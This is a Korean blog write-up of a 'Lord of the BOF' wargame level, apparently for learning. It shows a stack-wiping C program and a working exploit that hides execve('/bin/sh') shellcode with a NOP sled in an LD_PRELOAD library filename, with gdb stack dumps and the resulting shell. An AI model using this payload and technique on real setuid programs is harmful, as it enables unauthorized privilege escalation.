..
..나는누구..?
...여긴어디....?
이번 문제(뿐만아니라 모든 문제들에)에 한줄기 빛을 떨궈준 cd80형에게 엄청난 감사를 표하는 바입니다.
그래도 LD_PRELOAD쓰는방법은 모름미다. 알거같은데 시도를 안해봤어여. 해봐야징.
[(http://cd80.tistory.com)☜☜ 엄청난 시스해커 블로그!클릭클릭]
로그:
//소스를 처음에 봤는데 memset쪽이 뭔소린지 이해안가서 소스에따가 열씨미 주석달았습니다.
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
main(int argc, char *argv[])
{
char buffer[40];
int i;
if(argc < 2){
printf("argv error\n"); //아규멘트가 2개 이하면 ㅂㅂ!! :D
exit(0);
}
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n"); //48번째는 \xbf
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// stack destroyer!
memset(buffer, 0, 44); //버퍼의 44바이트를 다 뽀삼-buffer+sfp
memset(buffer+48, 0, 0xbfffffff - (int)(buffer+48));
/*그리고 리턴어드레스에 들어간 후의 것들도 다 파개
memset(source, data, amount of data)인데 0xbfffffff - (int)(buffer+48)란 뜻은 buffer+48부터 bfffffff까지의 거리만큼을 다 파괘한단 소리다 절망적이네 */
}
[skeleton@localhost skeleton]$ mkdir `perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f"'`
[skeleton@localhost skeleton]$ mkdir `perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f"'`
[skeleton@localhost skeleton]$ gcc -shared -fPIC asdf.c -o `perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`.so
//여기서 쉘코드랑 놉썰매를 넣어여. 찾기 쉬워지거든여. 썰매도타공
[skeleton@localhost skeleton]$ export LD_PRELOAD=$PWD/`perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`.so
//LD_PRELOAD에 쉘코드뭉치를 넣어요.
[skeleton@localhost skeleton]$ gdb -q nolam core
Core was generated by ` '.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /home/skeleton/j
XRh//shh/binRSÍ̀.so...done.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0xbfbfbfbf in ?? ()
(gdb) q
[skeleton@localhost skeleton]$ ./nolam `perl -e 'print "\xbf"x48'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿
Segmentation fault (core dumped)
[skeleton@localhost skeleton]$ gdb -q nolam core
Core was generated by ` '.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /home/skeleton/j
XRh//shh/binRSÍ̀.so...done.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0xbfbfbfbf in ?? ()
(gdb) x/100wx 0xbfff0000
0xbfff0000: Cannot access memory at address 0xbfff0000
(gdb) x/100wx 0xbffff000
0xbffff000: 0x000005c9 0x0000029f 0x000006a6 0x0000045f
0xbffff010: 0x000006dd 0x000004a6 0x00000000 0x00000620
0xbffff020: 0x0000051e 0x00000000 0x00000584 0x0000069c
[중략..]
0xbffff610: 0x6b732f65 0x74656c65 0x902f6e6f 0x90909090
0xbffff620: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff630: 0x90909090 0x90909090 0x90909090 0x90909090
(gdb)
0xbffff640: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff650: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff660: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff670: 0x90909090 0x90909090 0x90909090 0x6a909090
0xbffff680: 0x5299580b 0x732f2f68 0x622f6868 0xe3896e69
0xbffff690: 0xe1895352 0x732e80cd 0x4000006f 0x40013868
0xbffff6a0: 0x4000220c 0xbffffbd1 0x00000000 0x00000000
0xbffff6b0: 0x00000000 0x00000000 0x40014a00 0x00000000
0xbffff6c0: 0x00000000 0x00000000 0x00000000 0x00000006
0xbffff6d0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6e0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6f0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff700: 0x00000000 0x00000001 0x00000000 0x00000001
0xbffff710: 0xbffff608 0x00060000 0x00000000 0x00000000
(gdb) q
[skeleton@localhost skeleton]$ vi `perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`.c
[skeleton@localhost skeleton]$ gcc -shared -fPIC `perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`.c -o `perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`.so
[skeleton@localhost skeleton]$ export LD_PRELOAD=$PWD/`perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`.so
[skeleton@localhost skeleton]$ cat `perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`.c
#include<stdio.h>
int main()
{
printf ("wat do i do");
return 31337;
} //소스 뻘글돋네여
[skeleton@localhost skeleton]$ ./nolam `perl -e 'print "\xbf"x48'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿
Segmentation fault (core dumped)
[skeleton@localhost skeleton]$ gdb -q nolam core
Core was generated by ` '.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /home/skeleton/j
XRh//shh/binRSÍ̀.so...done.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0xbfbfbfbf in ?? ()
(gdb) x/100wx 0xbfff0000
0xbfff0000: Cannot access memory at address 0xbfff0000
(gdb)
0xbfff0004: Cannot access memory at address 0xbfff0004
(gdb) x/100wx 0xbfff5000
0xbfff5000: Cannot access memory at address 0xbfff5000
(gdb) x/100wx 0xbfff9000
0xbfff9000: Cannot access memory at address 0xbfff9000
(gdb) x/100wx 0xbfffb000
0xbfffb000: Cannot access memory at address 0xbfffb000
(gdb) x/100wx 0xbfffd000
0xbfffd000: Cannot access memory at address 0xbfffd000
(gdb) x/100wx 0xbffff000 //일케 하나하나 스택을 올라감미다
0xbffff000: 0x000005c9 0x0000029f 0x000006a6 0x0000045f
0xbffff010: 0x000006dd 0x000004a6 0x00000000 0x00000620
0xbffff020: 0x0000051e 0x00000000 0x00000584 0x0000069c
0xbffff030: 0x00000716 0x0000054d 0x00000527 0x000004ed
0xbffff040: 0x000003a1 0x00000458 0x00000466 0x0000063f
0xbffff050: 0x00000000 0x000001ca 0x00000000 0x0000027f
[중략..]
0xbffff600: 0x6b732f65 0x74656c65 0x902f6e6f 0x90909090
0xbffff610: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff620: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff630: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff640: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff650: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff660: 0x90909090 0x90909090 0x90909090 0x6a909090
0xbffff670: 0x5299580b 0x732f2f68 0x622f6868 0xe3896e69
0xbffff680: 0xe1895352 0x732e80cd 0x4000006f 0x40013868
0xbffff690: 0x4000220c 0xbffffbbc 0x00000000 0x00000000
0xbffff6a0: 0x00000000 0x00000000 0x40014a00 0x00000000
0xbffff6b0: 0x00000000 0x00000000 0x00000000 0x00000006
0xbffff6c0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6d0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6e0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6f0: 0x00000000 0x00000001 0x00000000 0x00000001
0xbffff700: 0xbffff5f8 0x00060000 0x00000000 0x00000000
0xbffff710: 0x00000000 0x00000001 0x00000000 0x00000000
0xbffff720: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff730: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff740: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff750: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff760: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff770: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff780: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) q
The program is running. Exit anyway? (y or n) y
[skeleton@localhost skeleton]$ ./nolam `perl -e 'print "\x90"x44, "\x10\xf6\xff\xbf"'`
ö ¿
bash$ q
sh: q: command not found
bash$ exit
exit
[skeleton@localhost skeleton]$ ./golem `perl -e 'print "\x90"x44, "\x10\xf6\xff\xbf"'`
ö ¿
bash$ my-pass
euid = 511
방식을 안 후에도 삽질을 많이 했는데, 처음엔 "막 뭐 소스의 함수를 후킹하라는건갘ㅋㅋㅋㅋ아닐텐뎈ㅋㅋ"이러며 웃고있다가 LD_PRELOAD는 환경변수잖아여. 그래서 쉐어드 라이브러리명만 쉘코드로 해놨더니 이게 동적링크인걸로 알고있는데 그래서 쉘코드 안떠서..는 뻥이고요 지금보니까 소중히 잘 들어있네 난 무슨뻘짓을 한거지.
암튼 LD_PRELOAD란 공유라이브러리를 프로그램 실행전에 들고와서 스택에 고이고이 저장해둡니다. 찾아보니 그냥 스택에 찌꺼기가 남는다던데 그 이유는 뭔가 좀 복잡하다고 합니다. 그래서 음 그냥 공유라이브러리 파일명을 쉘코드로 하면 됬네여. 그렇네. ㅠ. 풀이 방법을 글로 읽기만 하고 시도해본거라 제가 했다고 할 수는 없지만 다음번에 또 써보고 싶은 기법이에여. 간지나잖아 처음에 코드보고 멘붕했는데 그것도 괜찮아진것 같고요 뭐 여러모로 멘붕이었지만 뿌듯하네요 횡설수설 잡담읽어주셔서 감사합니다. 배고프다. 모두들 안녕히주무세여 가정에 평화가 깃들기를
'STUDY > Lord of the BOF' 카테고리의 다른 글
darkknight->bugbear (2) | 2014.04.07 |
---|---|
golem->darkknight (0) | 2014.04.06 |
vampire->skeleton (2) | 2014.02.25 |
troll->vampire (0) | 2013.12.22 |
orge->troll (0) | 2013.12.21 |